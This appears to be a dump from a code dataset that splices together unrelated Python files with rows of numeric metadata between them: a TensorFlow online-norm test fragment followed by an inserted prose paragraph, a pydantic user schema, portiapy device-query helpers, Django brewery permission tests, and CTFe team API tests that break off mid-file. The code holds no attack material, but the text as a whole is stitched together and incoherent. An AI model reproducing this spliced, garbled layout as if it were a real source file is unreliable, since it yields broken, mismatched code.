num_features=16,
height=45,
width=64,
alpha_fwd=0.99,
alpha_bkw=0.99,
itrs=2,
):
"""
Test ON Layer against numpy implementation for 2d inputs
"""
# create inputs
np_inputs = np.random.randn(batch_size, num_features, height, width) + .25
# instantiate gradient at the output
np_grad_out = np.random.randn(batch_size, num_features, height, width) + .125
tf.keras.backend.set_floatx('float16')
self.template_numerical_comparison_on_vs_np(
np_inputs,
np_grad_out=np_grad_out,
axis=1,
alpha_fwd=alpha_fwd,
alpha_bkw=alpha_bkw,
itrs=itrs,
dtype=Policy('infer_float32_vars'),
)
if __name__ == '__main__':
unittest.main()
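This suite targets TensorFlow 1.x APIs (tf.placeholder, tf.Session, tf.logging), so it must run under TF 1. A minimal sketch for running one comparison test programmatically; the dotted test name is assumed from this file's layout:

import unittest

# Load a single named test case from this module and run it verbosely.
suite = unittest.defaultTestLoader.loadTestsFromName(
    'test_online_norm.TestOnlineNorm.'
    'test021_1d_numerical_comparison_on_fprop_vs_np'
)
unittest.TextTestRunner(verbosity=2).run(suite)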
| 29.239286
| 88
| 0.557225
| 1,995
| 16,374
| 4.26416
| 0.093734
| 0.049841
| 0.04126
| 0.067591
| 0.824615
| 0.817444
| 0.803691
| 0.794757
| 0.790055
| 0.751381
| 0
| 0.04321
| 0.365396
| 16,374
| 559
| 89
| 29.291592
| 0.775479
| 0.13039
| 0
| 0.750611
| 0
| 0
| 0.021983
| 0
| 0
| 0
| 0
| 0
| 0.00489
| 1
| 0.041565
| false
| 0
| 0.022005
| 0
| 0.066015
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
516687170da3c84b7297c2bfb50a324d916ef292
| 2,450
|
py
|
Python
|
users/schema.py
|
Mohamed-Kaizen/home_recruiters
|
5b2761ebcdb45bf2f99dd9f29c12a35c513677ad
|
[
"MIT"
] | 1
|
2021-03-09T13:16:05.000Z
|
2021-03-09T13:16:05.000Z
|
users/schema.py
|
Mohamed-Kaizen/home_recruiters
|
5b2761ebcdb45bf2f99dd9f29c12a35c513677ad
|
[
"MIT"
] | null | null | null |
users/schema.py
|
Mohamed-Kaizen/home_recruiters
|
5b2761ebcdb45bf2f99dd9f29c12a35c513677ad
|
[
"MIT"
] | 3
|
2020-05-02T20:49:03.000Z
|
2021-03-08T16:46:07.000Z
|
from typing import List
from core.settings import settings
from pydantic import BaseModel, EmailStr, Field, validator
from . import validators
from .models import Career
class TokenData(BaseModel):
username: str
exp: int
user_uuid: str
class WorkerCreate(BaseModel):
username: str = Field(..., min_length=1, max_length=250)
password: str = Field(
...,
min_length=settings.MINIMUM_PASSWORD_LENGTH,
max_length=settings.MAXIMUM_PASSWORD_LENGTH,
)
email: EmailStr
full_name: str = Field(..., max_length=400)
phone_number: str = Field(..., min_length=9, max_length=10)
career: Career
@validator("username")
def extra_validation_on_username(cls, value: str):
validators.validate_reserved_name(value=value, exception_class=ValueError)
validators.validate_confusables(value=value, exception_class=ValueError)
return value
@validator("email")
def extra_validation_on_email(cls, value: str):
local_part, domain = value.split("@")
validators.validate_reserved_name(value=local_part, exception_class=ValueError)
validators.validate_confusables_email(
domain=domain, local_part=local_part, exception_class=ValueError
)
return value
class UserList(BaseModel):
username: List[str]
class WorkerList(BaseModel):
username: List[str]
career: Career
class CustomerCreate(BaseModel):
username: str = Field(..., min_length=1, max_length=250)
password: str = Field(
...,
min_length=settings.MINIMUM_PASSWORD_LENGTH,
max_length=settings.MAXIMUM_PASSWORD_LENGTH,
)
email: EmailStr
full_name: str = Field(..., max_length=400)
phone_number: str = Field(..., min_length=9, max_length=10)
@validator("username")
def extra_validation_on_username(cls, value: str):
validators.validate_reserved_name(value=value, exception_class=ValueError)
validators.validate_confusables(value=value, exception_class=ValueError)
return value
@validator("email")
def extra_validation_on_email(cls, value: str):
local_part, domain = value.split("@")
validators.validate_reserved_name(value=local_part, exception_class=ValueError)
validators.validate_confusables_email(
domain=domain, local_part=local_part, exception_class=ValueError
)
return value
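A minimal sketch of exercising these schemas, assuming pydantic v1 (which the @validator usage implies) and that Career is an enum from .models; the PLUMBER member below is hypothetical:

from pydantic import ValidationError

try:
    worker = WorkerCreate(
        username='alice',
        password='a-sufficiently-long-password',  # bounds come from settings
        email='alice@example.com',
        full_name='Alice Example',
        phone_number='0123456789',
        career=Career.PLUMBER,  # hypothetical member; real values live in .models
    )
except ValidationError as exc:
    # Prints a field-by-field error report if any validator rejects the input.
    print(exc.json())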
| 23.557692
| 87
| 0.697551
| 279
| 2,450
| 5.878136
| 0.207885
| 0.039024
| 0.117073
| 0.062195
| 0.8
| 0.8
| 0.8
| 0.8
| 0.8
| 0.8
| 0
| 0.010304
| 0.207755
| 2,450
| 103
| 88
| 23.786408
| 0.834621
| 0
| 0
| 0.721311
| 0
| 0
| 0.011429
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.065574
| false
| 0.098361
| 0.081967
| 0
| 0.57377
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 7
|
5a8de511ba08a3849e1ce3ce45f57d989c95a12c
| 8,406
|
py
|
Python
|
portiapy/describe.py
|
AgrinessEdgeIoT/portiapy
|
efc5e4af2d94c57aa03b447ee015755532baaf70
|
[
"MIT"
] | 1
|
2019-05-22T18:38:01.000Z
|
2019-05-22T18:38:01.000Z
|
portiapy/describe.py
|
AgrinessEdgeIoT/portiapy
|
efc5e4af2d94c57aa03b447ee015755532baaf70
|
[
"MIT"
] | 4
|
2018-09-17T13:16:18.000Z
|
2021-02-26T13:30:49.000Z
|
portiapy/describe.py
|
AgrinessEdgeIoT/portiapy
|
efc5e4af2d94c57aa03b447ee015755532baaf70
|
[
"MIT"
] | null | null | null |
"""Description tools to discover a device's list of ports, sensors and
dimensions.
"""
import json
import pandas as pd
import portiapy.utils as utils
def device_ports(
portia_config: dict,
edge_id: str,
        last: bool = False,
        params: dict = None) -> object:
"""Lists a device's ports.
Arguments:
portia_config {dict} -- Portia's configuration arguments
edge_id {str} -- Edge ID that identifies the device
Keyword Arguments:
last {bool} -- if the last package of each port should be returned or
not (default: {False})
params {dict} -- params to send to the service (default:
{{ 'from', 'to', 'sort', 'precision': 'ms',
'timezone': 'Etc/UTC' }})
Returns:
object -- object with the list of ports
Raises:
Exception -- when the request goes wrong
"""
    # Build the default query params here to avoid a shared mutable default.
    if params is None:
        params = {
            'from': None,
            'to': None,
            'sort': True,
            'precision': 'ms',
            'timezone': 'Etc/UTC',
        }
    if not last:
        endpoint = '/describe/device/{0}/ports'.format(edge_id)
    else:
        endpoint = '/describe/device/{0}/ports/last'.format(edge_id)
response = utils.http_get_request(portia_config, endpoint, params)
if response.status_code == 200:
d = json.loads(response.text).get('ports')
if portia_config.get('debug'):
print('[portia-debug]: {0}'.format(d))
        if last:
d = pd.DataFrame(
d,
columns=['header_timestamp', 'port', 'dimension_thing_code']
)
d['port'] = d['port'].map(int)
d['dimension_thing_code'] = d['dimension_thing_code'].map(int)
else:
d = list(map(int, d))
return d
else:
raise Exception("couldn't retrieve data")
def device_port_sensors(
portia_config: dict,
edge_id: str,
port: int,
        last: bool = False,
        params: dict = None) -> object:
"""Lists a port's sensors.
Arguments:
portia_config {dict} -- Portia's configuration arguments
edge_id {str} -- Edge ID that identifies the device
port {int} -- port of the device
Keyword Arguments:
last {bool} -- if the last package of each port should be returned or
not (default: {False})
params {dict} -- params to send to the service (default:
{{ 'from', 'to', 'sort', 'precision': 'ms',
'timezone': 'Etc/UTC' }})
Returns:
object -- object with the list of sensors
Raises:
Exception -- when the request goes wrong
"""
    # Build the default query params here to avoid a shared mutable default.
    if params is None:
        params = {
            'from': None,
            'to': None,
            'sort': True,
            'precision': 'ms',
            'timezone': 'Etc/UTC',
        }
    if not last:
        endpoint = '/describe/device/{0}/port/{1}/sensors' \
            .format(edge_id, port)
    else:
        endpoint = '/describe/device/{0}/port/{1}/sensors/last' \
            .format(edge_id, port)
response = utils.http_get_request(portia_config, endpoint, params)
if response.status_code == 200:
d = json.loads(response.text).get('sensors')
if portia_config.get('debug'):
print('[portia-debug]: {0}'.format(d))
        if last:
d = pd.DataFrame(
d,
columns=[
'header_timestamp',
'sensor',
'dimension_value',
'dimension_code',
'dimension_unity_code',
'dimension_thing_code'
]
)
d['sensor'] = d['sensor'].map(int)
d['dimension_code'] = d['dimension_code'].map(int)
d['dimension_unity_code'] = d['dimension_unity_code'].map(int)
d['dimension_thing_code'] = d['dimension_thing_code'].map(int)
else:
d = list(map(int, d))
return d
else:
raise Exception("couldn't retrieve data")
def device_port_dimensions(
portia_config: dict,
edge_id: str,
port: int,
        last: bool = False,
        params: dict = None) -> object:
"""Lists a port's dimensions.
Arguments:
portia_config {dict} -- Portia's configuration arguments
edge_id {str} -- Edge ID that identifies the device
port {int} -- port of the device
Keyword Arguments:
last {bool} -- if the last package of each port should be returned or
not (default: {False})
params {dict} -- params to send to the service (default:
{{ 'from', 'to', 'sort', 'precision': 'ms',
'timezone': 'Etc/UTC' }})
Returns:
object -- object with the list of dimensions
Raises:
Exception -- when the request goes wrong
"""
    # Build the default query params here to avoid a shared mutable default.
    if params is None:
        params = {
            'from': None,
            'to': None,
            'sort': True,
            'precision': 'ms',
            'timezone': 'Etc/UTC',
        }
    if not last:
        endpoint = '/describe/device/{0}/port/{1}/dimensions' \
            .format(edge_id, port)
    else:
        endpoint = '/describe/device/{0}/port/{1}/dimensions/last' \
            .format(edge_id, port)
response = utils.http_get_request(portia_config, endpoint, params)
if response.status_code == 200:
d = json.loads(response.text).get('dimensions')
if portia_config.get('debug'):
print('[portia-debug]: {0}'.format(d))
        if last:
d = pd.DataFrame(
d,
columns=[
'header_timestamp',
'dimension_code',
'sensor',
'dimension_thing_code'
]
)
d['sensor'] = d['sensor'].map(int)
d['dimension_code'] = d['dimension_code'].map(int)
d['dimension_thing_code'] = d['dimension_thing_code'].map(int)
else:
d = list(map(int, d))
return d
else:
raise Exception("couldn't retrieve data")
def device_port_sensor_dimensions(
portia_config: dict,
edge_id: str,
port: int,
sensor: int,
        last: bool = False,
        params: dict = None) -> object:
"""Lists a sensor's dimensions.
Arguments:
portia_config {dict} -- Portia's configuration arguments
edge_id {str} -- Edge ID that identifies the device
port {int} -- port of the device
sensor {int} -- sensor of the device
Keyword Arguments:
last {bool} -- if the last package of each port should be returned or
not (default: {False})
params {dict} -- params to send to the service (default:
{{ 'from', 'to', 'sort', 'precision': 'ms',
'timezone': 'Etc/UTC' }})
Returns:
object -- object with the list of dimensions
Raises:
Exception -- when the request goes wrong
"""
    # Build the default query params here to avoid a shared mutable default.
    if params is None:
        params = {
            'from': None,
            'to': None,
            'sort': True,
            'precision': 'ms',
            'timezone': 'Etc/UTC',
        }
    if not last:
        endpoint = '/describe/device/{0}/port/{1}/sensor/{2}/dimensions' \
            .format(edge_id, port, sensor)
    else:
        endpoint = '/describe/device/{0}/port/{1}/sensor/{2}/dimensions/last' \
            .format(edge_id, port, sensor)
response = utils.http_get_request(portia_config, endpoint, params)
if response.status_code == 200:
d = json.loads(response.text).get('dimensions')
if portia_config.get('debug'):
print('[portia-debug]: {0}'.format(d))
        if last:
d = pd.DataFrame(
d,
columns=[
'header_timestamp',
'dimension_value',
'dimension_code',
'dimension_unity_code',
'dimension_thing_code'
]
)
d['dimension_code'] = d['dimension_code'].map(int)
d['dimension_unity_code'] = d['dimension_unity_code'].map(int)
d['dimension_thing_code'] = d['dimension_thing_code'].map(int)
else:
d = list(map(int, d))
return d
else:
raise Exception("couldn't retrieve data")
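A minimal usage sketch; only the 'debug' key is read directly in this module, so the auth-related contents of portia_config (the 'token' key below is hypothetical) depend on what portiapy.utils.http_get_request expects:

portia_config = {'token': '<api-token>', 'debug': True}  # hypothetical keys

ports = device_ports(portia_config, edge_id='0123456789')              # e.g. [1, 2, 3]
latest = device_ports(portia_config, edge_id='0123456789', last=True)  # DataFrame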
| 29.598592
| 79
| 0.521175
| 921
| 8,406
| 4.644951
| 0.111835
| 0.02805
| 0.050491
| 0.041141
| 0.932211
| 0.917017
| 0.906498
| 0.897616
| 0.897616
| 0.870968
| 0
| 0.005875
| 0.35201
| 8,406
| 283
| 80
| 29.70318
| 0.779512
| 0.301213
| 0
| 0.834356
| 0
| 0
| 0.237588
| 0.059216
| 0
| 0
| 0
| 0
| 0
| 1
| 0.02454
| false
| 0
| 0.018405
| 0
| 0.067485
| 0.02454
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
5abc7a1139221cf55f84178c698dbfa0b36bb17a
| 15,332
|
py
|
Python
|
brewery/permissions_test.py
|
willjschmitt/joulia-webserver
|
712decb749c2d1bda71af49ecab245378bf30078
|
[
"FTL"
] | null | null | null |
brewery/permissions_test.py
|
willjschmitt/joulia-webserver
|
712decb749c2d1bda71af49ecab245378bf30078
|
[
"FTL"
] | 95
|
2016-08-04T01:59:37.000Z
|
2021-06-10T18:41:46.000Z
|
brewery/permissions_test.py
|
willjschmitt/joulia-webserver
|
712decb749c2d1bda71af49ecab245378bf30078
|
[
"FTL"
] | null | null | null |
"""Tests for the brewery.permissions module."""
from django.contrib.auth.models import Group
from django.contrib.auth.models import User
from django.test import TestCase
from unittest.mock import Mock
from brewery import models
from brewery import permissions
class IsContinuousIntegrationToEditTest(TestCase):
"""Tests for the IsContinuousIntegrationToEdit permissions class."""
# def has_permission(self, request, view):
# if request.method in SAFE_METHODS:
# return True
#
# if not request.user:
# return False
#
# return request.user.group_set.filter(
# name=self._CONTINUOUS_INTEGRATION_GROUP_NAME).exists()
def test_has_permission_with_get(self):
permission = permissions.IsContinuousIntegrationToEdit()
user = User.objects.create(username="user")
request = Mock()
request.user = user
request.method = 'GET'
view = None
self.assertTrue(permission.has_permission(request, view))
def test_has_permission_fails_with_no_user(self):
permission = permissions.IsContinuousIntegrationToEdit()
request = Mock()
request.method = 'POST'
request.user = None
view = None
self.assertFalse(permission.has_permission(request, view))
    def test_has_permission_with_continuous_integration_user(self):
permission = permissions.IsContinuousIntegrationToEdit()
user = User.objects.create(username="user")
group = Group.objects.get(
name=permissions.CONTINUOUS_INTEGRATION_GROUP_NAME)
group.user_set.add(user)
request = Mock()
request.user = user
request.method = 'POST'
view = None
self.assertTrue(permission.has_permission(request, view))
class IsMemberTest(TestCase):
"""Tests for IsMember permissions class."""
def test_has_permission(self):
permission = permissions.IsMember()
user = User.objects.create(username="user")
group = Group.objects.create(name="group")
group.user_set.add(user)
request = Mock()
request.user = user
view = None
brewing_company = models.BrewingCompany(group=group)
self.assertTrue(permission.has_object_permission(
request, view, brewing_company))
def test_does_not_have_permission(self):
permission = permissions.IsMember()
user = User.objects.create(username="user")
group = Group.objects.create(name="group")
request = Mock()
request.user = user
view = None
brewing_company = models.BrewingCompany(group=group)
self.assertFalse(permission.has_object_permission(
request, view, brewing_company))
class IsMemberOfBrewingCompanyTest(TestCase):
"""Tests for IsMemberOfBrewingCompany permissions class."""
def test_has_permission_safe_method(self):
permission = permissions.IsMemberOfBrewingCompany()
request = Mock()
request.method = "GET"
view = None
self.assertTrue(permission.has_permission(request, view))
def test_has_permission_member_of_company(self):
permission = permissions.IsMemberOfBrewingCompany()
user = User.objects.create(username="user")
group = Group.objects.create(name="group")
group.user_set.add(user)
brewing_company = models.BrewingCompany.objects.create(group=group)
request = Mock()
request.user = user
request.method = "POST"
request.POST = {
"company": brewing_company.pk,
}
view = None
self.assertTrue(permission.has_permission(request, view))
def test_has_permission_not_member_of_company(self):
permission = permissions.IsMemberOfBrewingCompany()
user = User.objects.create(username="user")
group = Group.objects.create(name="group")
brewing_company = models.BrewingCompany.objects.create(group=group)
request = Mock()
request.user = user
request.method = "POST"
request.POST = {
"company": brewing_company.pk,
}
view = None
self.assertFalse(permission.has_permission(request, view))
def test_has_object_permission(self):
permission = permissions.IsMemberOfBrewingCompany()
user = User.objects.create(username="user")
group = Group.objects.create(name="group")
group.user_set.add(user)
request = Mock()
request.user = user
view = None
brewing_company = models.BrewingCompany(group=group)
brewery = models.Brewery(company=brewing_company)
self.assertTrue(permission.has_object_permission(
request, view, brewery))
def test_does_not_have_object_permission(self):
permission = permissions.IsMemberOfBrewingCompany()
user = User.objects.create(username="user")
group = Group.objects.create(name="group")
request = Mock()
request.user = user
view = None
brewing_company = models.BrewingCompany(group=group)
brewery = models.Brewery(company=brewing_company)
self.assertFalse(permission.has_object_permission(
request, view, brewery))
class IsMemberOfBreweryTest(TestCase):
"""Tests for IsMemberOfBrewery permissions class."""
def test_has_permission_safe_method(self):
permission = permissions.IsMemberOfBrewery()
request = Mock()
request.method = "GET"
view = None
self.assertTrue(permission.has_permission(request, view))
def test_has_permission_member_of_company(self):
permission = permissions.IsMemberOfBrewery()
user = User.objects.create(username="user")
group = Group.objects.create(name="group")
group.user_set.add(user)
brewing_company = models.BrewingCompany.objects.create(group=group)
brewery = models.Brewery.objects.create(company=brewing_company)
request = Mock()
request.user = user
request.method = "POST"
request.POST = {
"brewery": brewery.pk,
}
view = None
self.assertTrue(permission.has_permission(request, view))
def test_has_permission_not_member_of_company(self):
permission = permissions.IsMemberOfBrewery()
user = User.objects.create(username="user")
group = Group.objects.create(name="group")
brewing_company = models.BrewingCompany.objects.create(group=group)
brewery = models.Brewery.objects.create(company=brewing_company)
request = Mock()
request.user = user
request.method = "POST"
request.POST = {
"brewery": brewery.pk,
}
view = None
self.assertFalse(permission.has_permission(request, view))
def test_has_object_permission(self):
permission = permissions.IsMemberOfBrewery()
user = User.objects.create(username="user")
group = Group.objects.create(name="group")
group.user_set.add(user)
request = Mock()
request.user = user
view = None
brewing_company = models.BrewingCompany(group=group)
brewery = models.Brewery(company=brewing_company)
brewhouse = models.Brewhouse(brewery=brewery)
self.assertTrue(permission.has_object_permission(
request, view, brewhouse))
def test_does_not_have_object_permission(self):
permission = permissions.IsMemberOfBrewery()
user = User.objects.create(username="user")
group = Group.objects.create(name="group")
request = Mock()
request.user = user
view = None
brewing_company = models.BrewingCompany(group=group)
brewery = models.Brewery(company=brewing_company)
brewhouse = models.Brewhouse(brewery=brewery)
self.assertFalse(permission.has_object_permission(
request, view, brewhouse))
class OwnsRecipeTest(TestCase):
"""Tests for OwnsRecipe permissions class."""
def test_has_permission_safe_method(self):
permission = permissions.OwnsRecipe()
request = Mock()
request.method = "GET"
view = None
self.assertTrue(permission.has_permission(request, view))
def test_has_permission_member_of_company(self):
permission = permissions.OwnsRecipe()
user = User.objects.create(username="user")
group = Group.objects.create(name="group")
group.user_set.add(user)
brewing_company = models.BrewingCompany.objects.create(group=group)
recipe = models.Recipe.objects.create(company=brewing_company)
request = Mock()
request.user = user
request.method = "POST"
request.POST = {
"recipe": recipe.pk,
}
view = None
self.assertTrue(permission.has_permission(request, view))
def test_has_permission_not_member_of_company(self):
permission = permissions.OwnsRecipe()
user = User.objects.create(username="user")
group = Group.objects.create(name="group")
brewing_company = models.BrewingCompany.objects.create(group=group)
recipe = models.Recipe.objects.create(company=brewing_company)
request = Mock()
request.user = user
request.method = "POST"
request.POST = {
"recipe": recipe.pk,
}
view = None
self.assertFalse(permission.has_permission(request, view))
def test_has_permission(self):
permission = permissions.OwnsRecipe()
user = User.objects.create(username="user")
group = Group.objects.create(name="group")
group.user_set.add(user)
request = Mock()
request.user = user
view = None
brewing_company = models.BrewingCompany(group=group)
recipe = models.Recipe(company=brewing_company)
recipe_instance = models.RecipeInstance(recipe=recipe)
self.assertTrue(permission.has_object_permission(
request, view, recipe_instance))
def test_does_not_have_permission(self):
permission = permissions.OwnsRecipe()
user = User.objects.create(username="user")
group = Group.objects.create(name="group")
request = Mock()
request.user = user
view = None
brewing_company = models.BrewingCompany(group=group)
recipe = models.Recipe(company=brewing_company)
recipe_instance = models.RecipeInstance(recipe=recipe)
self.assertFalse(permission.has_object_permission(
request, view, recipe_instance))
class OwnsSensorTest(TestCase):
"""Tests for OwnsSensor permissions class."""
def test_has_permission_safe_method(self):
permission = permissions.OwnsSensor()
request = Mock()
request.method = "GET"
view = None
self.assertTrue(permission.has_permission(request, view))
def test_has_permission_member_of_company(self):
permission = permissions.OwnsSensor()
user = User.objects.create(username="user")
group = Group.objects.create(name="group")
group.user_set.add(user)
brewing_company = models.BrewingCompany.objects.create(group=group)
brewery = models.Brewery.objects.create(company=brewing_company)
brewhouse = models.Brewhouse.objects.create(brewery=brewery)
sensor = models.AssetSensor.objects.create(brewhouse=brewhouse)
request = Mock()
request.user = user
request.method = "POST"
request.POST = {
"sensor": sensor.pk,
}
view = None
self.assertTrue(permission.has_permission(request, view))
def test_has_permission_not_member_of_company(self):
permission = permissions.OwnsSensor()
user = User.objects.create(username="user")
group = Group.objects.create(name="group")
brewing_company = models.BrewingCompany.objects.create(group=group)
brewery = models.Brewery.objects.create(company=brewing_company)
brewhouse = models.Brewhouse.objects.create(brewery=brewery)
sensor = models.AssetSensor.objects.create(brewhouse=brewhouse)
request = Mock()
request.user = user
request.method = "POST"
request.POST = {
"sensor": sensor.pk,
}
view = None
self.assertFalse(permission.has_permission(request, view))
def test_has_permission(self):
permission = permissions.OwnsSensor()
user = User.objects.create(username="user")
group = Group.objects.create(name="group")
group.user_set.add(user)
request = Mock()
request.user = user
view = None
brewing_company = models.BrewingCompany.objects.create(group=group)
brewery = models.Brewery.objects.create(company=brewing_company)
brewhouse = models.Brewhouse.objects.create(brewery=brewery)
recipe = models.Recipe.objects.create(company=brewing_company)
recipe_instance = models.RecipeInstance.objects.create(recipe=recipe)
sensor = models.AssetSensor.objects.create(brewhouse=brewhouse)
data_point = models.TimeSeriesDataPoint.objects.create(
sensor=sensor, recipe_instance=recipe_instance)
self.assertTrue(permission.has_object_permission(
request, view, data_point))
def test_does_not_have_permission(self):
permission = permissions.OwnsSensor()
user = User.objects.create(username="user")
group = Group.objects.create(name="group")
request = Mock()
request.user = user
view = None
brewing_company = models.BrewingCompany.objects.create(group=group)
brewery = models.Brewery.objects.create(company=brewing_company)
brewhouse = models.Brewhouse.objects.create(brewery=brewery)
recipe = models.Recipe.objects.create(company=brewing_company)
recipe_instance = models.RecipeInstance.objects.create(recipe=recipe)
sensor = models.AssetSensor.objects.create(brewhouse=brewhouse)
data_point = models.TimeSeriesDataPoint.objects.create(
sensor=sensor, recipe_instance=recipe_instance)
self.assertFalse(permission.has_object_permission(
request, view, data_point))
class IsMemberOfBrewingCompanyFunctionTest(TestCase):
"""Tests for is_member_of_brewing_company function."""
def test_is_member(self):
user = User.objects.create(username="user")
group = Group.objects.create(name="group")
group.user_set.add(user)
brewing_company = models.BrewingCompany(group=group)
self.assertTrue(permissions.is_member_of_brewing_company(
user, brewing_company))
def test_is_not_member(self):
user = User.objects.create(username="user")
group = Group.objects.create(name="group")
brewing_company = models.BrewingCompany(group=group)
self.assertFalse(permissions.is_member_of_brewing_company(
user, brewing_company))
def test_no_group(self):
user = User.objects.create(username="user")
brewing_company = models.BrewingCompany()
self.assertFalse(permissions.is_member_of_brewing_company(
user, brewing_company))
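These TestCase classes are written for Django's test runner; assuming the project's usual manage.py entry point, the module runs with:

python manage.py test brewery.permissions_test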
| 38.717172
| 77
| 0.66821
| 1,592
| 15,332
| 6.280151
| 0.05402
| 0.09752
| 0.062513
| 0.04831
| 0.904481
| 0.892479
| 0.884277
| 0.876375
| 0.810762
| 0.79806
| 0
| 0
| 0.233629
| 15,332
| 396
| 78
| 38.717172
| 0.850894
| 0.040699
| 0
| 0.89939
| 0
| 0
| 0.020396
| 0
| 0
| 0
| 0
| 0
| 0.085366
| 1
| 0.085366
| false
| 0
| 0.018293
| 0
| 0.125
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
85212b344249cdefa8bdd8b1153ec61c2aa01b88
| 15,539
|
py
|
Python
|
tests/test_team.py
|
nnonchev/CTFe
|
b4814e08593ec68b7befec8d07169a08a1ddec10
|
[
"MIT"
] | null | null | null |
tests/test_team.py
|
nnonchev/CTFe
|
b4814e08593ec68b7befec8d07169a08a1ddec10
|
[
"MIT"
] | null | null | null |
tests/test_team.py
|
nnonchev/CTFe
|
b4814e08593ec68b7befec8d07169a08a1ddec10
|
[
"MIT"
] | null | null | null |
import pytest
from httpx import AsyncClient
from CTFe.main import app
from CTFe.models import (
Team,
User,
)
from CTFe.schemas import team_schemas
from CTFe.utils import enums
from CTFe.config import constants
from . import (
dal,
BASE_URL,
)
# Create team tests
# ------------------
@pytest.mark.asyncio
async def test_create_team__already_exists():
team_data = {
"name": "team1",
}
db_team = Team(**team_data)
with dal.get_session_ctx() as session:
session.add(db_team)
session.commit()
session.refresh(db_team)
async with AsyncClient(app=app, base_url=BASE_URL) as client:
response = await client.post("/teams/", json=team_data)
assert response.status_code == 409
assert response.json() == {
"detail": f"The name: { team_data['name'] } is already taken"}
with dal.get_session_ctx() as session:
session.delete(db_team)
session.commit()
@pytest.mark.asyncio
async def test_create_team__success():
team_data = {
"name": "team1",
}
async with AsyncClient(app=app, base_url=BASE_URL) as client:
response = await client.post("/teams/", json=team_data)
assert response.status_code == 200
assert "id" in response.json().keys()
assert ("name", team_data["name"]) in response.json().items()
with dal.get_session_ctx() as session:
id = response.json()["id"]
db_team = session.query(Team).filter(Team.id == id).first()
session.delete(db_team)
session.commit()
# Get team tests
# ---------------
@pytest.mark.asyncio
async def test_get_team__not_found():
async with AsyncClient(app=app, base_url=BASE_URL) as client:
response = await client.get("/teams/-1")
assert response.status_code == 404
assert response.json() == {"detail": "Team not found"}
@pytest.mark.asyncio
async def test_get_team__success():
team_data = {
"name": "team1",
}
db_team = Team(**team_data)
with dal.get_session_ctx() as session:
session.add(db_team)
session.commit()
session.refresh(db_team)
team_details = team_schemas.Details.from_orm(db_team)
async with AsyncClient(app=app, base_url=BASE_URL) as client:
response = await client.get(f"/teams/{db_team.id}")
assert response.status_code == 200
assert response.json() == team_details
with dal.get_session_ctx() as session:
session.delete(db_team)
session.commit()
@pytest.mark.asyncio
async def test_get_team_by_name__not_found():
name = "team1"
async with AsyncClient(app=app, base_url=BASE_URL) as client:
response = await client.get(f"/teams/name/{name}")
assert response.status_code == 404
assert response.json() == {"detail": "Team not found"}
@pytest.mark.asyncio
async def test_get_team_by_name__success():
team_data = {
"name": "team1",
}
db_team = Team(**team_data)
with dal.get_session_ctx() as session:
session.add(db_team)
session.commit()
session.refresh(db_team)
team_details = team_schemas.Details.from_orm(db_team)
async with AsyncClient(app=app, base_url=BASE_URL) as client:
response = await client.get(f"/teams/name/{db_team.name}")
assert response.status_code == 200
assert response.json() == team_details
with dal.get_session_ctx() as session:
session.delete(db_team)
session.commit()
@pytest.mark.asyncio
async def test_get_all_teams__success():
async with AsyncClient(app=app, base_url=BASE_URL) as client:
response = await client.get("/teams/")
assert response.status_code == 200
assert response.json() == []
# Update team tests
# ------------------
@pytest.mark.asyncio
async def test_update_team__not_found():
team_data = {}
async with AsyncClient(app=app, base_url=BASE_URL) as client:
response = await client.put(f"/teams/-1", json=team_data)
assert response.status_code == 404
assert response.json() == {"detail": "Team not found"}
@pytest.mark.asyncio
async def test_update_team__success():
team_data = {
"name": "team old",
}
new_team_data = {
"name": "team new",
}
db_team = Team(**team_data)
with dal.get_session_ctx() as session:
session.add(db_team)
session.commit()
session.refresh(db_team)
async with AsyncClient(app=app, base_url=BASE_URL) as client:
response = await client.put(f"/teams/{db_team.id}", json=new_team_data)
with dal.get_session_ctx() as session:
session.add(db_team)
session.refresh(db_team)
team_details = team_schemas.Details.from_orm(db_team)
assert response.status_code == 200
assert response.json() == team_details
with dal.get_session_ctx() as session:
session.delete(db_team)
session.commit()
# Add players to team tests
# --------------------------
@pytest.mark.asyncio
async def test_add_player_to_team__team_not_found():
async with AsyncClient(app=app, base_url=BASE_URL) as client:
response = await client.patch(f"/teams/-1/add-player/1")
assert response.status_code == 404
assert response.json() == {"detail": "Team not found"}
@pytest.mark.asyncio
async def test_add_player_to_team__max_member_number_exceeded():
original_val = constants.MAX_TEAM_MEMBERS
constants.MAX_TEAM_MEMBERS = 1
users_data = [
{
"username": "user1",
"password": "secret",
},
{
"username": "user2",
"password": "secret",
}
]
team_data = {
"name": "team 1",
}
db_team = Team(**team_data)
db_user1 = User(**users_data[0])
db_user2 = User(**users_data[1])
db_team.players.append(db_user1)
with dal.get_session_ctx() as session:
session.add(db_team)
session.add(db_user1)
session.add(db_user2)
session.commit()
session.refresh(db_team)
session.refresh(db_user1)
session.refresh(db_user2)
async with AsyncClient(app=app, base_url=BASE_URL) as client:
response = await client.patch(f"/teams/{db_team.id}/add-player/{db_user2.id}")
assert response.status_code == 403
assert response.json() == {
"detail": "The team already has the maximum number of members in it"}
with dal.get_session_ctx() as session:
session.delete(db_team)
session.delete(db_user1)
session.delete(db_user2)
session.commit()
constants.MAX_TEAM_MEMBERS = original_val
@pytest.mark.asyncio
